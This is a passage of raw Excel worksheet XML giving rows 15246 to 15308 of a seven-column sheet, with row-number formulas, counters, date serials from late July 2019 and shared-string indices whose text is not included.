        <f t="shared" si="238"/>
        <v>15245</v>
      </c>
      <c r="B15246">
        <v>245</v>
      </c>
      <c r="C15246" t="s">
        <v>25497</v>
      </c>
      <c r="D15246" s="1">
        <v>43672</v>
      </c>
      <c r="E15246" t="s">
        <v>25837</v>
      </c>
      <c r="F15246" t="s">
        <v>9975</v>
      </c>
      <c r="G15246" t="s">
        <v>25838</v>
      </c>
    </row>
    <row r="15247" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15247">
        <f t="shared" si="238"/>
        <v>15246</v>
      </c>
      <c r="B15247">
        <v>246</v>
      </c>
      <c r="C15247" t="s">
        <v>25497</v>
      </c>
      <c r="D15247" s="1">
        <v>43672</v>
      </c>
      <c r="E15247" t="s">
        <v>25839</v>
      </c>
      <c r="F15247" t="s">
        <v>9975</v>
      </c>
      <c r="G15247" t="s">
        <v>25840</v>
      </c>
    </row>
    <row r="15248" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15248">
        <f t="shared" si="238"/>
        <v>15247</v>
      </c>
      <c r="B15248">
        <v>247</v>
      </c>
      <c r="C15248" t="s">
        <v>25497</v>
      </c>
      <c r="D15248" s="1">
        <v>43677</v>
      </c>
      <c r="E15248" t="s">
        <v>25841</v>
      </c>
      <c r="F15248" t="s">
        <v>9975</v>
      </c>
      <c r="G15248" t="s">
        <v>25842</v>
      </c>
    </row>
    <row r="15249" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15249">
        <f t="shared" si="238"/>
        <v>15248</v>
      </c>
      <c r="B15249">
        <v>248</v>
      </c>
      <c r="C15249" t="s">
        <v>25497</v>
      </c>
      <c r="D15249" s="1">
        <v>43671</v>
      </c>
      <c r="F15249" t="s">
        <v>10021</v>
      </c>
      <c r="G15249" t="s">
        <v>25843</v>
      </c>
    </row>
    <row r="15250" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15250">
        <f t="shared" si="238"/>
        <v>15249</v>
      </c>
      <c r="B15250">
        <v>249</v>
      </c>
      <c r="C15250" t="s">
        <v>25497</v>
      </c>
      <c r="D15250" s="1">
        <v>43672</v>
      </c>
      <c r="F15250" t="s">
        <v>9978</v>
      </c>
      <c r="G15250" t="s">
        <v>25844</v>
      </c>
    </row>
    <row r="15251" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15251">
        <f t="shared" si="238"/>
        <v>15250</v>
      </c>
      <c r="B15251">
        <v>250</v>
      </c>
      <c r="C15251" t="s">
        <v>25497</v>
      </c>
      <c r="D15251" s="1">
        <v>43669</v>
      </c>
      <c r="E15251" t="s">
        <v>25517</v>
      </c>
      <c r="F15251" t="s">
        <v>9975</v>
      </c>
      <c r="G15251" t="s">
        <v>25845</v>
      </c>
    </row>
    <row r="15252" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15252">
        <f t="shared" si="238"/>
        <v>15251</v>
      </c>
      <c r="B15252">
        <v>251</v>
      </c>
      <c r="C15252" t="s">
        <v>25497</v>
      </c>
      <c r="D15252" s="1">
        <v>43670</v>
      </c>
      <c r="E15252" t="s">
        <v>25846</v>
      </c>
      <c r="F15252" t="s">
        <v>10526</v>
      </c>
      <c r="G15252" t="s">
        <v>25847</v>
      </c>
    </row>
    <row r="15253" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15253">
        <f t="shared" si="238"/>
        <v>15252</v>
      </c>
      <c r="B15253">
        <v>252</v>
      </c>
      <c r="C15253" t="s">
        <v>25497</v>
      </c>
      <c r="D15253" s="1">
        <v>43677</v>
      </c>
      <c r="E15253" t="s">
        <v>25592</v>
      </c>
      <c r="F15253" t="s">
        <v>9975</v>
      </c>
      <c r="G15253" t="s">
        <v>25848</v>
      </c>
    </row>
    <row r="15254" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15254">
        <f t="shared" si="238"/>
        <v>15253</v>
      </c>
      <c r="B15254">
        <v>253</v>
      </c>
      <c r="C15254" t="s">
        <v>25497</v>
      </c>
      <c r="D15254" s="1">
        <v>43676</v>
      </c>
      <c r="E15254" t="s">
        <v>25592</v>
      </c>
      <c r="F15254" t="s">
        <v>9975</v>
      </c>
      <c r="G15254" t="s">
        <v>25849</v>
      </c>
    </row>
    <row r="15255" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15255">
        <f t="shared" si="238"/>
        <v>15254</v>
      </c>
      <c r="B15255">
        <v>254</v>
      </c>
      <c r="C15255" t="s">
        <v>25497</v>
      </c>
      <c r="D15255" s="1">
        <v>43676</v>
      </c>
      <c r="E15255" t="s">
        <v>25850</v>
      </c>
      <c r="F15255" t="s">
        <v>9975</v>
      </c>
      <c r="G15255" t="s">
        <v>25851</v>
      </c>
    </row>
    <row r="15256" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15256">
        <f t="shared" si="238"/>
        <v>15255</v>
      </c>
      <c r="B15256">
        <v>255</v>
      </c>
      <c r="C15256" t="s">
        <v>25497</v>
      </c>
      <c r="D15256" s="1">
        <v>43676</v>
      </c>
      <c r="E15256" t="s">
        <v>25592</v>
      </c>
      <c r="F15256" t="s">
        <v>9975</v>
      </c>
      <c r="G15256" t="s">
        <v>25852</v>
      </c>
    </row>
    <row r="15257" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15257">
        <f t="shared" si="238"/>
        <v>15256</v>
      </c>
      <c r="B15257">
        <v>256</v>
      </c>
      <c r="C15257" t="s">
        <v>25497</v>
      </c>
      <c r="D15257" s="1">
        <v>43676</v>
      </c>
      <c r="E15257" t="s">
        <v>25853</v>
      </c>
      <c r="F15257" t="s">
        <v>10526</v>
      </c>
      <c r="G15257" t="s">
        <v>25854</v>
      </c>
    </row>
    <row r="15258" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15258">
        <f t="shared" si="238"/>
        <v>15257</v>
      </c>
      <c r="B15258">
        <v>257</v>
      </c>
      <c r="C15258" t="s">
        <v>25497</v>
      </c>
      <c r="D15258" s="1">
        <v>43669</v>
      </c>
      <c r="E15258" t="s">
        <v>25774</v>
      </c>
      <c r="F15258" t="s">
        <v>9975</v>
      </c>
      <c r="G15258" t="s">
        <v>25855</v>
      </c>
    </row>
    <row r="15259" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15259">
        <f t="shared" si="238"/>
        <v>15258</v>
      </c>
      <c r="B15259">
        <v>258</v>
      </c>
      <c r="C15259" t="s">
        <v>25497</v>
      </c>
      <c r="D15259" s="1">
        <v>43677</v>
      </c>
      <c r="F15259" t="s">
        <v>9975</v>
      </c>
      <c r="G15259" t="s">
        <v>25856</v>
      </c>
    </row>
    <row r="15260" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15260">
        <f t="shared" si="238"/>
        <v>15259</v>
      </c>
      <c r="B15260">
        <v>259</v>
      </c>
      <c r="C15260" t="s">
        <v>25497</v>
      </c>
      <c r="D15260" s="1">
        <v>43671</v>
      </c>
      <c r="E15260" t="s">
        <v>25565</v>
      </c>
      <c r="F15260" t="s">
        <v>9975</v>
      </c>
      <c r="G15260" t="s">
        <v>25857</v>
      </c>
    </row>
    <row r="15261" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15261">
        <f t="shared" si="238"/>
        <v>15260</v>
      </c>
      <c r="B15261">
        <v>260</v>
      </c>
      <c r="C15261" t="s">
        <v>25497</v>
      </c>
      <c r="D15261" s="1">
        <v>43672</v>
      </c>
      <c r="F15261" t="s">
        <v>10021</v>
      </c>
      <c r="G15261" t="s">
        <v>25858</v>
      </c>
    </row>
    <row r="15262" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15262">
        <f t="shared" si="238"/>
        <v>15261</v>
      </c>
      <c r="B15262">
        <v>261</v>
      </c>
      <c r="C15262" t="s">
        <v>25497</v>
      </c>
      <c r="D15262" s="1">
        <v>43670</v>
      </c>
      <c r="F15262" t="s">
        <v>9975</v>
      </c>
      <c r="G15262" t="s">
        <v>25859</v>
      </c>
    </row>
    <row r="15263" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15263">
        <f t="shared" si="238"/>
        <v>15262</v>
      </c>
      <c r="B15263">
        <v>262</v>
      </c>
      <c r="C15263" t="s">
        <v>25497</v>
      </c>
      <c r="D15263" s="1">
        <v>43677</v>
      </c>
      <c r="E15263" t="s">
        <v>25860</v>
      </c>
      <c r="F15263" t="s">
        <v>9975</v>
      </c>
      <c r="G15263" t="s">
        <v>25861</v>
      </c>
    </row>
    <row r="15264" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15264">
        <f t="shared" si="238"/>
        <v>15263</v>
      </c>
      <c r="B15264">
        <v>263</v>
      </c>
      <c r="C15264" t="s">
        <v>25497</v>
      </c>
      <c r="D15264" s="1">
        <v>43670</v>
      </c>
      <c r="E15264" t="s">
        <v>25642</v>
      </c>
      <c r="F15264" t="s">
        <v>9975</v>
      </c>
      <c r="G15264" t="s">
        <v>25862</v>
      </c>
    </row>
    <row r="15265" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15265">
        <f t="shared" si="238"/>
        <v>15264</v>
      </c>
      <c r="B15265">
        <v>264</v>
      </c>
      <c r="C15265" t="s">
        <v>25497</v>
      </c>
      <c r="D15265" s="1">
        <v>43677</v>
      </c>
      <c r="E15265" t="s">
        <v>25592</v>
      </c>
      <c r="F15265" t="s">
        <v>9975</v>
      </c>
      <c r="G15265" t="s">
        <v>25863</v>
      </c>
    </row>
    <row r="15266" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15266">
        <f t="shared" si="238"/>
        <v>15265</v>
      </c>
      <c r="B15266">
        <v>265</v>
      </c>
      <c r="C15266" t="s">
        <v>25497</v>
      </c>
      <c r="D15266" s="1">
        <v>43676</v>
      </c>
      <c r="F15266" t="s">
        <v>9975</v>
      </c>
      <c r="G15266" t="s">
        <v>25864</v>
      </c>
    </row>
    <row r="15267" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15267">
        <f t="shared" si="238"/>
        <v>15266</v>
      </c>
      <c r="B15267">
        <v>266</v>
      </c>
      <c r="C15267" t="s">
        <v>25497</v>
      </c>
      <c r="D15267" s="1">
        <v>43668</v>
      </c>
      <c r="E15267" t="s">
        <v>25512</v>
      </c>
      <c r="F15267" t="s">
        <v>9975</v>
      </c>
      <c r="G15267" t="s">
        <v>25865</v>
      </c>
    </row>
    <row r="15268" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15268">
        <f t="shared" si="238"/>
        <v>15267</v>
      </c>
      <c r="B15268">
        <v>267</v>
      </c>
      <c r="C15268" t="s">
        <v>25497</v>
      </c>
      <c r="D15268" s="1">
        <v>43671</v>
      </c>
      <c r="E15268" t="s">
        <v>25866</v>
      </c>
      <c r="F15268" t="s">
        <v>9975</v>
      </c>
      <c r="G15268" t="s">
        <v>25867</v>
      </c>
    </row>
    <row r="15269" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15269">
        <f t="shared" si="238"/>
        <v>15268</v>
      </c>
      <c r="B15269">
        <v>268</v>
      </c>
      <c r="C15269" t="s">
        <v>25497</v>
      </c>
      <c r="D15269" s="1">
        <v>43671</v>
      </c>
      <c r="E15269" t="s">
        <v>25502</v>
      </c>
      <c r="F15269" t="s">
        <v>9975</v>
      </c>
      <c r="G15269" t="s">
        <v>25868</v>
      </c>
    </row>
    <row r="15270" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15270">
        <f t="shared" si="238"/>
        <v>15269</v>
      </c>
      <c r="B15270">
        <v>269</v>
      </c>
      <c r="C15270" t="s">
        <v>25497</v>
      </c>
      <c r="D15270" s="1">
        <v>43676</v>
      </c>
      <c r="E15270" t="s">
        <v>25592</v>
      </c>
      <c r="F15270" t="s">
        <v>9975</v>
      </c>
      <c r="G15270" t="s">
        <v>25869</v>
      </c>
    </row>
    <row r="15271" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15271">
        <f t="shared" si="238"/>
        <v>15270</v>
      </c>
      <c r="B15271">
        <v>270</v>
      </c>
      <c r="C15271" t="s">
        <v>25497</v>
      </c>
      <c r="D15271" s="1">
        <v>43676</v>
      </c>
      <c r="E15271" t="s">
        <v>25870</v>
      </c>
      <c r="F15271" t="s">
        <v>9975</v>
      </c>
      <c r="G15271" t="s">
        <v>25871</v>
      </c>
    </row>
    <row r="15272" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15272">
        <f t="shared" si="238"/>
        <v>15271</v>
      </c>
      <c r="B15272">
        <v>271</v>
      </c>
      <c r="C15272" t="s">
        <v>25497</v>
      </c>
      <c r="D15272" s="1">
        <v>43675</v>
      </c>
      <c r="F15272" t="s">
        <v>9975</v>
      </c>
      <c r="G15272" t="s">
        <v>25872</v>
      </c>
    </row>
    <row r="15273" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15273">
        <f t="shared" si="238"/>
        <v>15272</v>
      </c>
      <c r="B15273">
        <v>272</v>
      </c>
      <c r="C15273" t="s">
        <v>25497</v>
      </c>
      <c r="D15273" s="1">
        <v>43675</v>
      </c>
      <c r="E15273" t="s">
        <v>25592</v>
      </c>
      <c r="F15273" t="s">
        <v>9975</v>
      </c>
      <c r="G15273" t="s">
        <v>25873</v>
      </c>
    </row>
    <row r="15274" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15274">
        <f t="shared" si="238"/>
        <v>15273</v>
      </c>
      <c r="B15274">
        <v>273</v>
      </c>
      <c r="C15274" t="s">
        <v>25497</v>
      </c>
      <c r="D15274" s="1">
        <v>43670</v>
      </c>
      <c r="F15274" t="s">
        <v>9978</v>
      </c>
      <c r="G15274" t="s">
        <v>25874</v>
      </c>
    </row>
    <row r="15275" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15275">
        <f t="shared" si="238"/>
        <v>15274</v>
      </c>
      <c r="B15275">
        <v>274</v>
      </c>
      <c r="C15275" t="s">
        <v>25497</v>
      </c>
      <c r="D15275" s="1">
        <v>43676</v>
      </c>
      <c r="E15275" t="s">
        <v>25592</v>
      </c>
      <c r="F15275" t="s">
        <v>9975</v>
      </c>
      <c r="G15275" t="s">
        <v>25875</v>
      </c>
    </row>
    <row r="15276" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15276">
        <f t="shared" si="238"/>
        <v>15275</v>
      </c>
      <c r="B15276">
        <v>275</v>
      </c>
      <c r="C15276" t="s">
        <v>25497</v>
      </c>
      <c r="D15276" s="1">
        <v>43676</v>
      </c>
      <c r="F15276" t="s">
        <v>9975</v>
      </c>
      <c r="G15276" t="s">
        <v>25876</v>
      </c>
    </row>
    <row r="15277" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15277">
        <f t="shared" si="238"/>
        <v>15276</v>
      </c>
      <c r="B15277">
        <v>276</v>
      </c>
      <c r="C15277" t="s">
        <v>25497</v>
      </c>
      <c r="D15277" s="1">
        <v>43670</v>
      </c>
      <c r="E15277" t="s">
        <v>25498</v>
      </c>
      <c r="F15277" t="s">
        <v>9975</v>
      </c>
      <c r="G15277" t="s">
        <v>25877</v>
      </c>
    </row>
    <row r="15278" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15278">
        <f t="shared" si="238"/>
        <v>15277</v>
      </c>
      <c r="B15278">
        <v>277</v>
      </c>
      <c r="C15278" t="s">
        <v>25497</v>
      </c>
      <c r="D15278" s="1">
        <v>43675</v>
      </c>
      <c r="E15278" t="s">
        <v>25517</v>
      </c>
      <c r="F15278" t="s">
        <v>9975</v>
      </c>
      <c r="G15278" t="s">
        <v>25878</v>
      </c>
    </row>
    <row r="15279" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15279">
        <f t="shared" si="238"/>
        <v>15278</v>
      </c>
      <c r="B15279">
        <v>278</v>
      </c>
      <c r="C15279" t="s">
        <v>25497</v>
      </c>
      <c r="D15279" s="1">
        <v>43675</v>
      </c>
      <c r="E15279" t="s">
        <v>25879</v>
      </c>
      <c r="F15279" t="s">
        <v>9978</v>
      </c>
      <c r="G15279" t="s">
        <v>25880</v>
      </c>
    </row>
    <row r="15280" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15280">
        <f t="shared" si="238"/>
        <v>15279</v>
      </c>
      <c r="B15280">
        <v>279</v>
      </c>
      <c r="C15280" t="s">
        <v>25497</v>
      </c>
      <c r="D15280" s="1">
        <v>43677</v>
      </c>
      <c r="E15280" t="s">
        <v>25881</v>
      </c>
      <c r="F15280" t="s">
        <v>9975</v>
      </c>
      <c r="G15280" t="s">
        <v>25882</v>
      </c>
    </row>
    <row r="15281" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15281">
        <f t="shared" si="238"/>
        <v>15280</v>
      </c>
      <c r="B15281">
        <v>280</v>
      </c>
      <c r="C15281" t="s">
        <v>25497</v>
      </c>
      <c r="D15281" s="1">
        <v>43670</v>
      </c>
      <c r="E15281" t="s">
        <v>25512</v>
      </c>
      <c r="F15281" t="s">
        <v>9975</v>
      </c>
      <c r="G15281" t="s">
        <v>25883</v>
      </c>
    </row>
    <row r="15282" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15282">
        <f t="shared" si="238"/>
        <v>15281</v>
      </c>
      <c r="B15282">
        <v>281</v>
      </c>
      <c r="C15282" t="s">
        <v>25497</v>
      </c>
      <c r="D15282" s="1">
        <v>43676</v>
      </c>
      <c r="E15282" t="s">
        <v>25509</v>
      </c>
      <c r="F15282" t="s">
        <v>10021</v>
      </c>
      <c r="G15282" t="s">
        <v>25884</v>
      </c>
    </row>
    <row r="15283" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15283">
        <f t="shared" si="238"/>
        <v>15282</v>
      </c>
      <c r="B15283">
        <v>282</v>
      </c>
      <c r="C15283" t="s">
        <v>25497</v>
      </c>
      <c r="D15283" s="1">
        <v>43671</v>
      </c>
      <c r="F15283" t="s">
        <v>9975</v>
      </c>
      <c r="G15283" t="s">
        <v>25885</v>
      </c>
    </row>
    <row r="15284" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15284">
        <f t="shared" si="238"/>
        <v>15283</v>
      </c>
      <c r="B15284">
        <v>283</v>
      </c>
      <c r="C15284" t="s">
        <v>25497</v>
      </c>
      <c r="D15284" s="1">
        <v>43677</v>
      </c>
      <c r="E15284" t="s">
        <v>25886</v>
      </c>
      <c r="F15284" t="s">
        <v>9975</v>
      </c>
      <c r="G15284" t="s">
        <v>25887</v>
      </c>
    </row>
    <row r="15285" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15285">
        <f t="shared" si="238"/>
        <v>15284</v>
      </c>
      <c r="B15285">
        <v>284</v>
      </c>
      <c r="C15285" t="s">
        <v>25497</v>
      </c>
      <c r="D15285" s="1">
        <v>43670</v>
      </c>
      <c r="E15285" t="s">
        <v>25584</v>
      </c>
      <c r="F15285" t="s">
        <v>9975</v>
      </c>
      <c r="G15285" t="s">
        <v>25888</v>
      </c>
    </row>
    <row r="15286" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15286">
        <f t="shared" si="238"/>
        <v>15285</v>
      </c>
      <c r="B15286">
        <v>285</v>
      </c>
      <c r="C15286" t="s">
        <v>25497</v>
      </c>
      <c r="D15286" s="1">
        <v>43675</v>
      </c>
      <c r="E15286" t="s">
        <v>25512</v>
      </c>
      <c r="F15286" t="s">
        <v>9975</v>
      </c>
      <c r="G15286" t="s">
        <v>25889</v>
      </c>
    </row>
    <row r="15287" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15287">
        <f t="shared" si="238"/>
        <v>15286</v>
      </c>
      <c r="B15287">
        <v>286</v>
      </c>
      <c r="C15287" t="s">
        <v>25497</v>
      </c>
      <c r="D15287" s="1">
        <v>43669</v>
      </c>
      <c r="E15287" t="s">
        <v>25890</v>
      </c>
      <c r="F15287" t="s">
        <v>9975</v>
      </c>
      <c r="G15287" t="s">
        <v>25891</v>
      </c>
    </row>
    <row r="15288" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15288">
        <f t="shared" si="238"/>
        <v>15287</v>
      </c>
      <c r="B15288">
        <v>287</v>
      </c>
      <c r="C15288" t="s">
        <v>25497</v>
      </c>
      <c r="D15288" s="1">
        <v>43669</v>
      </c>
      <c r="E15288" t="s">
        <v>25892</v>
      </c>
      <c r="F15288" t="s">
        <v>9975</v>
      </c>
      <c r="G15288" t="s">
        <v>25893</v>
      </c>
    </row>
    <row r="15289" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15289">
        <f t="shared" si="238"/>
        <v>15288</v>
      </c>
      <c r="B15289">
        <v>288</v>
      </c>
      <c r="C15289" t="s">
        <v>25497</v>
      </c>
      <c r="D15289" s="1">
        <v>43677</v>
      </c>
      <c r="E15289" t="s">
        <v>25592</v>
      </c>
      <c r="F15289" t="s">
        <v>9975</v>
      </c>
      <c r="G15289" t="s">
        <v>25894</v>
      </c>
    </row>
    <row r="15290" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15290">
        <f t="shared" si="238"/>
        <v>15289</v>
      </c>
      <c r="B15290">
        <v>289</v>
      </c>
      <c r="C15290" t="s">
        <v>25497</v>
      </c>
      <c r="D15290" s="1">
        <v>43677</v>
      </c>
      <c r="E15290" t="s">
        <v>25895</v>
      </c>
      <c r="F15290" t="s">
        <v>9975</v>
      </c>
      <c r="G15290" t="s">
        <v>25896</v>
      </c>
    </row>
    <row r="15291" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15291">
        <f t="shared" si="238"/>
        <v>15290</v>
      </c>
      <c r="B15291">
        <v>290</v>
      </c>
      <c r="C15291" t="s">
        <v>25497</v>
      </c>
      <c r="D15291" s="1">
        <v>43669</v>
      </c>
      <c r="E15291" t="s">
        <v>25517</v>
      </c>
      <c r="F15291" t="s">
        <v>9975</v>
      </c>
      <c r="G15291" t="s">
        <v>25897</v>
      </c>
    </row>
    <row r="15292" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15292">
        <f t="shared" si="238"/>
        <v>15291</v>
      </c>
      <c r="B15292">
        <v>291</v>
      </c>
      <c r="C15292" t="s">
        <v>25497</v>
      </c>
      <c r="D15292" s="1">
        <v>43677</v>
      </c>
      <c r="E15292" t="s">
        <v>25898</v>
      </c>
      <c r="F15292" t="s">
        <v>10021</v>
      </c>
      <c r="G15292" t="s">
        <v>25899</v>
      </c>
    </row>
    <row r="15293" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15293">
        <f t="shared" si="238"/>
        <v>15292</v>
      </c>
      <c r="B15293">
        <v>292</v>
      </c>
      <c r="C15293" t="s">
        <v>25497</v>
      </c>
      <c r="D15293" s="1">
        <v>43668</v>
      </c>
      <c r="E15293" t="s">
        <v>25900</v>
      </c>
      <c r="F15293" t="s">
        <v>9978</v>
      </c>
      <c r="G15293" t="s">
        <v>25901</v>
      </c>
    </row>
    <row r="15294" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15294">
        <f t="shared" si="238"/>
        <v>15293</v>
      </c>
      <c r="B15294">
        <v>293</v>
      </c>
      <c r="C15294" t="s">
        <v>25497</v>
      </c>
      <c r="D15294" s="1">
        <v>43670</v>
      </c>
      <c r="E15294" t="s">
        <v>25902</v>
      </c>
      <c r="F15294" t="s">
        <v>10526</v>
      </c>
      <c r="G15294" t="s">
        <v>25903</v>
      </c>
    </row>
    <row r="15295" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15295">
        <f t="shared" si="238"/>
        <v>15294</v>
      </c>
      <c r="B15295">
        <v>294</v>
      </c>
      <c r="C15295" t="s">
        <v>25497</v>
      </c>
      <c r="D15295" s="1">
        <v>43669</v>
      </c>
      <c r="F15295" t="s">
        <v>9975</v>
      </c>
      <c r="G15295" t="s">
        <v>25904</v>
      </c>
    </row>
    <row r="15296" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15296">
        <f t="shared" si="238"/>
        <v>15295</v>
      </c>
      <c r="B15296">
        <v>295</v>
      </c>
      <c r="C15296" t="s">
        <v>25497</v>
      </c>
      <c r="D15296" s="1">
        <v>43677</v>
      </c>
      <c r="F15296" t="s">
        <v>9975</v>
      </c>
      <c r="G15296" t="s">
        <v>25905</v>
      </c>
    </row>
    <row r="15297" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15297">
        <f t="shared" si="238"/>
        <v>15296</v>
      </c>
      <c r="B15297">
        <v>296</v>
      </c>
      <c r="C15297" t="s">
        <v>25497</v>
      </c>
      <c r="D15297" s="1">
        <v>43675</v>
      </c>
      <c r="E15297" t="s">
        <v>25614</v>
      </c>
      <c r="F15297" t="s">
        <v>9975</v>
      </c>
      <c r="G15297" t="s">
        <v>25906</v>
      </c>
    </row>
    <row r="15298" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15298">
        <f t="shared" si="238"/>
        <v>15297</v>
      </c>
      <c r="B15298">
        <v>297</v>
      </c>
      <c r="C15298" t="s">
        <v>25497</v>
      </c>
      <c r="D15298" s="1">
        <v>43668</v>
      </c>
      <c r="E15298" t="s">
        <v>25517</v>
      </c>
      <c r="F15298" t="s">
        <v>9975</v>
      </c>
      <c r="G15298" t="s">
        <v>25907</v>
      </c>
    </row>
    <row r="15299" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15299">
        <f t="shared" ref="A15299:A15362" si="239">+ROW(A15298)</f>
        <v>15298</v>
      </c>
      <c r="B15299">
        <v>298</v>
      </c>
      <c r="C15299" t="s">
        <v>25497</v>
      </c>
      <c r="D15299" s="1">
        <v>43676</v>
      </c>
      <c r="F15299" t="s">
        <v>9975</v>
      </c>
      <c r="G15299" t="s">
        <v>25908</v>
      </c>
    </row>
    <row r="15300" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15300">
        <f t="shared" si="239"/>
        <v>15299</v>
      </c>
      <c r="B15300">
        <v>299</v>
      </c>
      <c r="C15300" t="s">
        <v>25497</v>
      </c>
      <c r="D15300" s="1">
        <v>43677</v>
      </c>
      <c r="F15300" t="s">
        <v>9975</v>
      </c>
      <c r="G15300" t="s">
        <v>25909</v>
      </c>
    </row>
    <row r="15301" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15301">
        <f t="shared" si="239"/>
        <v>15300</v>
      </c>
      <c r="B15301">
        <v>300</v>
      </c>
      <c r="C15301" t="s">
        <v>25497</v>
      </c>
      <c r="D15301" s="1">
        <v>43676</v>
      </c>
      <c r="E15301" t="s">
        <v>25517</v>
      </c>
      <c r="F15301" t="s">
        <v>9975</v>
      </c>
      <c r="G15301" t="s">
        <v>25910</v>
      </c>
    </row>
    <row r="15302" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15302">
        <f t="shared" si="239"/>
        <v>15301</v>
      </c>
      <c r="B15302">
        <v>301</v>
      </c>
      <c r="C15302" t="s">
        <v>25497</v>
      </c>
      <c r="D15302" s="1">
        <v>43673</v>
      </c>
      <c r="F15302" t="s">
        <v>9975</v>
      </c>
      <c r="G15302" t="s">
        <v>25911</v>
      </c>
    </row>
    <row r="15303" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15303">
        <f t="shared" si="239"/>
        <v>15302</v>
      </c>
      <c r="B15303">
        <v>302</v>
      </c>
      <c r="C15303" t="s">
        <v>25497</v>
      </c>
      <c r="D15303" s="1">
        <v>43672</v>
      </c>
      <c r="E15303" t="s">
        <v>25912</v>
      </c>
      <c r="F15303" t="s">
        <v>9975</v>
      </c>
      <c r="G15303" t="s">
        <v>25913</v>
      </c>
    </row>
    <row r="15304" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15304">
        <f t="shared" si="239"/>
        <v>15303</v>
      </c>
      <c r="B15304">
        <v>303</v>
      </c>
      <c r="C15304" t="s">
        <v>25497</v>
      </c>
      <c r="D15304" s="1">
        <v>43672</v>
      </c>
      <c r="E15304" t="s">
        <v>25914</v>
      </c>
      <c r="F15304" t="s">
        <v>9975</v>
      </c>
      <c r="G15304" t="s">
        <v>25915</v>
      </c>
    </row>
    <row r="15305" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15305">
        <f t="shared" si="239"/>
        <v>15304</v>
      </c>
      <c r="B15305">
        <v>304</v>
      </c>
      <c r="C15305" t="s">
        <v>25497</v>
      </c>
      <c r="D15305" s="1">
        <v>43668</v>
      </c>
      <c r="E15305" t="s">
        <v>25916</v>
      </c>
      <c r="F15305" t="s">
        <v>9975</v>
      </c>
      <c r="G15305" t="s">
        <v>25917</v>
      </c>
    </row>
    <row r="15306" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15306">
        <f t="shared" si="239"/>
        <v>15305</v>
      </c>
      <c r="B15306">
        <v>305</v>
      </c>
      <c r="C15306" t="s">
        <v>25497</v>
      </c>
      <c r="D15306" s="1">
        <v>43676</v>
      </c>
      <c r="E15306" t="s">
        <v>25774</v>
      </c>
      <c r="F15306" t="s">
        <v>9975</v>
      </c>
      <c r="G15306" t="s">
        <v>25918</v>
      </c>
    </row>
    <row r="15307" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15307">
        <f t="shared" si="239"/>
        <v>15306</v>
      </c>
      <c r="B15307">
        <v>306</v>
      </c>
      <c r="C15307" t="s">
        <v>25497</v>
      </c>
      <c r="D15307" s="1">
        <v>43676</v>
      </c>
      <c r="E15307" t="s">
        <v>25517</v>
      </c>
      <c r="F15307" t="s">
        <v>9975</v>
      </c>
      <c r="G15307" t="s">
        <v>25919</v>
      </c>
    </row>
    <row r="15308" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A15308">
        <f t="shared" si="239"/>
        <v>15307</v>
      </c>
      <c r="B15308">
        <v>307</v>
      </c>
      <c r="C15308" t="s">
        <v>25497</v>
      </c>
      <c r="D15308" s="1">
        <v>43676</v>
      </c>
      <c r="E15308" t="s">
        <v>25538</v>
      </c>
      <c r="F15308" t="s">
        <v>9975</v>
      </c>
      <c r="G15308" t="s">
        <v>25920</v>
      </c>
    </row>
